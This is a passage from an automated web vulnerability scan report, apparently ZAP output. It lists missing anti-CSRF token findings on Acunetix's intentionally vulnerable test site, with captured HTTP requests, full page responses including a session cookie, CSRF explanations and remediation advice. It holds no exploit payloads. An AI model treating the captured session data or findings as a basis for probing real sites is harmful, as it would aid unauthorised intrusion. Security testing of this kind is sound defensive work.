          * The victim is authenticated via HTTP auth on the target site.

          * The victim is on the same local network as the target site.

          CSRF has primarily been used to perform an action against a target site using the victim's privileges, but recent techniques have been discovered to disclose information by gaining access to the response. The risk of information disclosure is dramatically increased when the target site is vulnerable to XSS, because XSS can be used as a platform for CSRF, allowing the attack to operate within the bounds of the same-origin policy.

          Other info

          No known Anti-CSRF token [anticsrf, CSRFToken, __RequestVerificationToken, csrfmiddlewaretoken, authenticity_token, OWASP_CSRFTOKEN, anoncsrf, csrf_token, _csrf, _csrfSecret, __csrf_magic, CSRF, _token, _csrf_token] was found in the following HTML form: [Form 1: "__EVENTARGUMENT" "__EVENTTARGET" "__EVENTVALIDATION" "__VIEWSTATE" "__VIEWSTATEGENERATOR" "btnSend" ].

          Request
          Request line and header section (322 bytes)
          GET http://testaspnet.vulnweb.com/Comments.aspx?id=0 HTTP/1.1
          Host: testaspnet.vulnweb.com
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
          Pragma: no-cache
          Cache-Control: no-cache
          Referer: http://testaspnet.vulnweb.com
          Cookie: ASP.NET_SessionId=s1yels3ja2tusr45pvgdn232
          
          
          Request body (0 bytes)
          Response
          Status line and header section (222 bytes)
          HTTP/1.1 200 OK
          Cache-Control: private
          Content-Type: text/html; charset=utf-8
          Server: Microsoft-IIS/8.5
          X-AspNet-Version: 2.0.50727
          X-Powered-By: ASP.NET
          Date: Mon, 25 Jul 2022 13:05:18 GMT
          Content-Length: 13707
          
          
          Response body (13707 bytes)
          
          <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >
          <HTML>
          	<HEAD>
          		<title>Comments</title>
          		<meta name="GENERATOR" Content="Microsoft Visual Studio .NET 7.1">
          		<meta name="CODE_LANGUAGE" Content="C#">
          		<meta name="vs_defaultClientScript" content="JavaScript">
          		<meta name="vs_targetSchema" content="http://schemas.microsoft.com/intellisense/ie5">
          		<LINK href="styles.css" type="text/css" rel="stylesheet">
          	</HEAD>
          	<body>
          		<form name="Form1" method="post" action="Comments.aspx?id=0" id="Form1">
          <div>
          <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" />
          <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" />
          <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTg2MjcwMzE2Mg9kFgICAQ9kFggCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgMPFgIfAQVJcG9zdGVkIGJ5IDxzdHJvbmc+YWRtaW4gICAgICAgICAgICAgICAgICAgIDwvc3Ryb25nPjUvMTYvMjAxOSAxMjozMjozMCBQTWQCBQ8WBB8BBT5BY3VuZXRpeCBWdWxuZXJhYmlsaXR5IFNjYW5uZXIgTm93IFdpdGggTmV0d29yayBTZWN1cml0eSBTY2Fucx8ABRJSZWFkTmV3cy5hc3B4P2lkPTBkAgcPFgIfAQVEU2VhbWxlc3MgT3BlblZBUyBpbnRlZ3JhdGlvbiBub3cgYWxzbyBhdmFpbGFibGUgb24gV2luZG93cyBhbmQgTGludXhkZD0ABLMUBs9bepCq8oSQPQHk/TUy" />
          </div>
          
          <script type="text/javascript">
          //<![CDATA[
          var theForm = document.forms['Form1'];
          if (!theForm) {
              theForm = document.Form1;
          }
          function __doPostBack(eventTarget, eventArgument) {
              if (!theForm.onsubmit || (theForm.onsubmit() != false)) {
                  theForm.__EVENTTARGET.value = eventTarget;
                  theForm.__EVENTARGUMENT.value = eventArgument;
                  theForm.submit();
              }
          }
          //]]>
          </script>
          
          
          <div>
          
          	<input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="58A73C4D" />
          	<input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="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" />
          </div>
          			
          <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">
          	<TR>
          		<TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD>
          		<TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640"
          			height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD>
          	</TR>
          </TABLE>
          <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">
          	<TR>
          		<TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A>
          			<A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="MainMenu1_lnkLog" class="menu" name="lnkLog">login</a>  <a href="Signup.aspx" id="MainMenu1_lnkSignup" class="menu" name="lnkSignup">
          				signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A>
          				<A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A>
          		</TD>
          		<td class="MenuBar" align="right" width="50px">
          			<A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A>
          		</td>
          	</TR>
          </TABLE>
          
          			<TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0">
          				<TR>
          					<TD vAlign="top">
          						<DIV id="divNewsDate" class="NewsDate">posted by <strong>admin                    </strong>5/16/2019 12:32:30 PM</DIV>
          						<a href="ReadNews.aspx?id=0" id="anchNewsTitle" class="NewsTitle">Acunetix Vulnerability Scanner Now With Network Security Scans</a>
          						<DIV id="divNewsShort" class="NewsShort">Seamless OpenVAS integration now also available on Windows and Linux</DIV>
          						<div id="divComments">User comments:
          							<table id="tblComments" cellspacing="0" cellpadding="0" width="500" border="0">
          </table>
          
          						</div>
          						<TABLE id="Table2" cellSpacing="0" cellPadding="0" width="500" border="0">
          							<TR>
          								<TD vAlign="bottom"><IMG src="images/comment-before.gif"></TD>
          							</TR>
          							<TR>
          								<TD class="Comment" vAlign="middle">
          									<textarea name="tbComment" rows="2" cols="20" id="tbComment" class="CommentTA"></textarea>
          									<input type="submit" name="btnSend" value="Send comment" id="btnSend" /></TD>
          							</TR>
          							<TR>
          								<TD vAlign="top"><IMG src="images/comment-after.gif"></TD>
          							</TR>
          						</TABLE>
          					</TD>
          					<TD vAlign="top" width="200">
          						<table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;">
          	<tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;">
          		<tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8187')" style="color:Black" title="Go to the previous month">&lt;</a></td><td align="center" style="width:70%;">July 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8248')" style="color:Black" title="Go to the next month">&gt;</a></td></tr>
          	</table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8212')" style="color:Black" title="June 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8213')" style="color:Black" title="June 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8214')" style="color:Black" title="June 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8215')" style="color:Black" title="June 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8216')" style="color:Black" title="June 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8217')" style="color:Black" title="July 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8218')" style="color:Black" title="July 02">2</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8219')" style="color:Black" title="July 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8220')" style="color:Black" title="July 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8221')" style="color:Black" title="July 05">5</a></td><td align="center" style="width:14%;"><a 
href="javascript:__doPostBack('RightPanel1$Calendar','8222')" style="color:Black" title="July 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8223')" style="color:Black" title="July 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8224')" style="color:Black" title="July 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8225')" style="color:Black" title="July 09">9</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8226')" style="color:Black" title="July 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8227')" style="color:Black" title="July 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8228')" style="color:Black" title="July 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8229')" style="color:Black" title="July 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8230')" style="color:Black" title="July 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8231')" style="color:Black" title="July 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8232')" style="color:Black" title="July 16">16</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8233')" style="color:Black" title="July 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8234')" style="color:Black" title="July 18">18</a></td><td align="center" style="width:14%;"><a 
href="javascript:__doPostBack('RightPanel1$Calendar','8235')" style="color:Black" title="July 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8236')" style="color:Black" title="July 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8237')" style="color:Black" title="July 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8238')" style="color:Black" title="July 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8239')" style="color:Black" title="July 23">23</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8240')" style="color:Black" title="July 24">24</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8241')" style="color:Black" title="July 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8242')" style="color:Black" title="July 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8243')" style="color:Black" title="July 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8244')" style="color:Black" title="July 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8245')" style="color:Black" title="July 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8246')" style="color:Black" title="July 30">30</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8247')" style="color:Black" title="July 31">31</a></td><td align="center" style="width:14%;"><a 
href="javascript:__doPostBack('RightPanel1$Calendar','8248')" style="color:Black" title="August 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8249')" style="color:Black" title="August 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8250')" style="color:Black" title="August 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8251')" style="color:Black" title="August 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8252')" style="color:Black" title="August 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8253')" style="color:Black" title="August 06">6</a></td></tr>
          </table><BR>
          <a href="rssFeed.aspx">Get RSS feed</a>
          
          					</TD>
          				</TR>
          				<TR>
          					<TD colSpan="2"></TD>
          				</TR>
          			</TABLE>
          		</form>
          	</body>
          	<div style="background-color:lightgray;width:40%;margin:auto;bottom:2px;text-align:center;font-size:12px;padding:1px">
          		<p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p>
          	</div>
          </HTML>
          
          Evidence
          <form name="Form1" method="post" action="Comments.aspx?id=0" id="Form1">
          Solution

          Phase: Architecture and Design

          Use a vetted library or framework that does not allow this weakness to occur or provides constructs that make this weakness easier to avoid.

          For example, use anti-CSRF packages such as the OWASP CSRFGuard.

          Phase: Implementation

          Ensure that your application is free of cross-site scripting issues, because most CSRF defenses can be bypassed using attacker-controlled script.

          Phase: Architecture and Design

          Generate a unique nonce for each form, place the nonce into the form, and verify the nonce upon receipt of the form. Be sure that the nonce is not predictable (CWE-330).

          Note that this can be bypassed using XSS.

          Identify especially dangerous operations. When the user performs a dangerous operation, send a separate confirmation request to ensure that the user intended to perform that operation.

          Note that this can be bypassed using XSS.

          Use the ESAPI Session Management control.

          This control includes a component for CSRF.

          Do not use the GET method for any request that triggers a state change.

          Phase: Implementation

          Check the HTTP Referer header to see if the request originated from an expected page. This could break legitimate functionality, because users or proxies may have disabled sending the Referer for privacy reasons.

        5. GET http://testaspnet.vulnweb.com/Comments.aspx?id=2
          Alert tags
          Alert description

          No anti-CSRF token was found in the submitted HTML form.

          A cross-site request forgery is an attack that involves forcing a victim to send an HTTP request to a target destination without their knowledge or intent in order to perform an action as the victim. The underlying cause is application functionality using predictable URL/form actions in a repeatable way. The nature of the attack is that CSRF exploits the trust that a web site has for a user. By contrast, cross-site scripting (XSS) exploits the trust that a user has for a web site. Like XSS, CSRF attacks are not necessarily cross-site, but they can be. Cross-site request forgery is also known as CSRF, XSRF, one-click attack, session riding, confused deputy, and sea surf.

          CSRF attacks are effective in a number of situations, including:

          * The victim has an active session on the target site.

          * The victim is authenticated via HTTP auth on the target site.

          * The victim is on the same local network as the target site.

          CSRF has primarily been used to perform an action against a target site using the victim's privileges, but recent techniques have been discovered to disclose information by gaining access to the response. The risk of information disclosure is dramatically increased when the target site is vulnerable to XSS, because XSS can be used as a platform for CSRF, allowing the attack to operate within the bounds of the same-origin policy.

          Other info

          No known Anti-CSRF token [anticsrf, CSRFToken, __RequestVerificationToken, csrfmiddlewaretoken, authenticity_token, OWASP_CSRFTOKEN, anoncsrf, csrf_token, _csrf, _csrfSecret, __csrf_magic, CSRF, _token, _csrf_token] was found in the following HTML form: [Form 1: "__EVENTARGUMENT" "__EVENTTARGET" "__EVENTVALIDATION" "__VIEWSTATE" "__VIEWSTATEGENERATOR" "btnSend" ].

          Request
          Request line and header section (322 bytes)
          GET http://testaspnet.vulnweb.com/Comments.aspx?id=2 HTTP/1.1
          Host: testaspnet.vulnweb.com
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
          Pragma: no-cache
          Cache-Control: no-cache
          Referer: http://testaspnet.vulnweb.com
          Cookie: ASP.NET_SessionId=s1yels3ja2tusr45pvgdn232
          
          
          Request body (0 bytes)
          Response
          Status line and header section (222 bytes)
          HTTP/1.1 200 OK
          Cache-Control: private
          Content-Type: text/html; charset=utf-8
          Server: Microsoft-IIS/8.5
          X-AspNet-Version: 2.0.50727
          X-Powered-By: ASP.NET
          Date: Mon, 25 Jul 2022 13:05:18 GMT
          Content-Length: 14245
          
          
          Response body (14245 bytes)
          
          <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >
          <HTML>
          	<HEAD>
          		<title>Comments</title>
          		<meta name="GENERATOR" Content="Microsoft Visual Studio .NET 7.1">
          		<meta name="CODE_LANGUAGE" Content="C#">
          		<meta name="vs_defaultClientScript" content="JavaScript">
          		<meta name="vs_targetSchema" content="http://schemas.microsoft.com/intellisense/ie5">
          		<LINK href="styles.css" type="text/css" rel="stylesheet">
          	</HEAD>
          	<body>
          		<form name="Form1" method="post" action="Comments.aspx?id=2" id="Form1">
          <div>
          <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" />
          <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" />
          <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="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" />
          </div>
          
          <script type="text/javascript">
          //<![CDATA[
          var theForm = document.forms['Form1'];
          if (!theForm) {
              theForm = document.Form1;
          }
          function __doPostBack(eventTarget, eventArgument) {
              if (!theForm.onsubmit || (theForm.onsubmit() != false)) {
                  theForm.__EVENTTARGET.value = eventTarget;
                  theForm.__EVENTARGUMENT.value = eventArgument;
                  theForm.submit();
              }
          }
          //]]>
          </script>
          
          
          <div>
          
          	<input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="58A73C4D" />
          	<input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="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" />
          </div>
          			
          <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">
          	<TR>
          		<TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD>
          		<TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640"
          			height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD>
          	</TR>
          </TABLE>
          <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">
          	<TR>
          		<TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A>
          			<A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="MainMenu1_lnkLog" class="menu" name="lnkLog">login</a>  <a href="Signup.aspx" id="MainMenu1_lnkSignup" class="menu" name="lnkSignup">
          				signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A>
          				<A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A>
          		</TD>
          		<td class="MenuBar" align="right" width="50px">
          			<A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A>
          		</td>
          	</TR>
          </TABLE>
          
          			<TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0">
          				<TR>
          					<TD vAlign="top">
          						<DIV id="divNewsDate" class="NewsDate">posted by <strong>admin                    </strong>11/8/2005 11:35:22 AM</DIV>
          						<a href="ReadNews.aspx?id=2" id="anchNewsTitle" class="NewsTitle">Web attacks - can your web applications withstand the force?</a>
          						<DIV id="divNewsShort" class="NewsShort">21 July 2005 - Start-up company Acunetix released Acunetix Web Vulnerability Scanner: a tool to automatically audit website security. Acunetix Web Vulnerability Scanner 2 crawls an entire website, launches popular web attacks (SQL Injection etc.) and identifies vulnerabilities that need to be fixed.</DIV>
          						<div id="divComments">User comments:
          							<table id="tblComments" cellspacing="0" cellpadding="0" width="500" border="0">
          </table>
          
          						</div>
          						<TABLE id="Table2" cellSpacing="0" cellPadding="0" width="500" border="0">
          							<TR>
          								<TD vAlign="bottom"><IMG src="images/comment-before.gif"></TD>
          							</TR>
          							<TR>
          								<TD class="Comment" vAlign="middle">
          									<textarea name="tbComment" rows="2" cols="20" id="tbComment" class="CommentTA"></textarea>
          									<input type="submit" name="btnSend" value="Send comment" id="btnSend" /></TD>
          							</TR>
          							<TR>
          								<TD vAlign="top"><IMG src="images/comment-after.gif"></TD>
          							</TR>
          						</TABLE>
          					</TD>
          					<TD vAlign="top" width="200">
          						<table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;">
          	<tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;">
          		<tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8187')" style="color:Black" title="Go to the previous month">&lt;</a></td><td align="center" style="width:70%;">July 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8248')" style="color:Black" title="Go to the next month">&gt;</a></td></tr>
          	</table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8212')" style="color:Black" title="June 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8213')" style="color:Black" title="June 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8214')" style="color:Black" title="June 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8215')" style="color:Black" title="June 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8216')" style="color:Black" title="June 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8217')" style="color:Black" title="July 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8218')" style="color:Black" title="July 02">2</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8219')" style="color:Black" title="July 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8220')" style="color:Black" title="July 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8221')" style="color:Black" title="July 05">5</a></td><td align="center" style="width:14%;"><a 
href="javascript:__doPostBack('RightPanel1$Calendar','8222')" style="color:Black" title="July 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8223')" style="color:Black" title="July 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8224')" style="color:Black" title="July 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8225')" style="color:Black" title="July 09">9</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8226')" style="color:Black" title="July 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8227')" style="color:Black" title="July 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8228')" style="color:Black" title="July 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8229')" style="color:Black" title="July 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8230')" style="color:Black" title="July 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8231')" style="color:Black" title="July 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8232')" style="color:Black" title="July 16">16</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8233')" style="color:Black" title="July 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8234')" style="color:Black" title="July 18">18</a></td><td align="center" style="width:14%;"><a 
href="javascript:__doPostBack('RightPanel1$Calendar','8235')" style="color:Black" title="July 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8236')" style="color:Black" title="July 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8237')" style="color:Black" title="July 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8238')" style="color:Black" title="July 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8239')" style="color:Black" title="July 23">23</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8240')" style="color:Black" title="July 24">24</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8241')" style="color:Black" title="July 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8242')" style="color:Black" title="July 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8243')" style="color:Black" title="July 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8244')" style="color:Black" title="July 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8245')" style="color:Black" title="July 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8246')" style="color:Black" title="July 30">30</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8247')" style="color:Black" title="July 31">31</a></td><td align="center" style="width:14%;"><a 
href="javascript:__doPostBack('RightPanel1$Calendar','8248')" style="color:Black" title="August 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8249')" style="color:Black" title="August 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8250')" style="color:Black" title="August 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8251')" style="color:Black" title="August 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8252')" style="color:Black" title="August 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8253')" style="color:Black" title="August 06">6</a></td></tr>
          </table><BR>
          <a href="rssFeed.aspx">Get RSS feed</a>
          
          					</TD>
          				</TR>
          				<TR>
          					<TD colSpan="2"></TD>
          				</TR>
          			</TABLE>
          		</form>
          	</body>
          	<div style="background-color:lightgray;width:40%;margin:auto;bottom:2px;text-align:center;font-size:12px;padding:1px">
          		<p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p>
          	</div>
          </HTML>
          
          Evidence
          <form name="Form1" method="post" action="Comments.aspx?id=2" id="Form1">
          Solution

          Phase: Architecture and Design

          Use a vetted library or framework that does not allow this weakness to occur or provides constructs that make this weakness easier to avoid.

          For example, use anti-CSRF packages such as the OWASP CSRFGuard.

          Phase: Implementation

          Ensure that your application is free of cross-site scripting issues, because most CSRF defenses can be bypassed using attacker-controlled script.

          Phase: Architecture and Design

          Generate a unique nonce for each form, place the nonce into the form, and verify the nonce upon receipt of the form. Be sure that the nonce is not predictable (CWE-330).

          Note that this can be bypassed using XSS.

          Identify especially dangerous operations. When the user performs a dangerous operation, send a separate confirmation request to ensure that the user intended to perform that operation.

          Note that this can be bypassed using XSS.

          Use the ESAPI Session Management control.

          This control includes a component for CSRF.

          Do not use the GET method for any request that triggers a state change.

          Phase: Implementation

          Check the HTTP Referer header to see if the request originated from an expected page. This could break legitimate functionality, because users or proxies may have disabled sending the Referer for privacy reasons.

        6. GET http://testaspnet.vulnweb.com/Comments.aspx?id=3
          Alert tags
          Alert description

          No anti-CSRF token was found in the submitted HTML form.

          A cross-site request forgery is an attack that involves forcing a victim to send an HTTP request to a target destination without their knowledge or intent in order to perform an action as the victim. The underlying cause is application functionality using predictable URL/form actions in a repeatable way. The nature of the attack is that CSRF exploits the trust that a web site has for a user. By contrast, cross-site scripting (XSS) exploits the trust that a user has for a web site. Like XSS, CSRF attacks are not necessarily cross-site, but they can be. Cross-site request forgery is also known as CSRF, XSRF, one-click attack, session riding, confused deputy, and sea surf.

          CSRF attacks are effective in a number of situations, including:

          * The victim has an active session on the target site.

          * The victim is authenticated via HTTP auth on the target site.

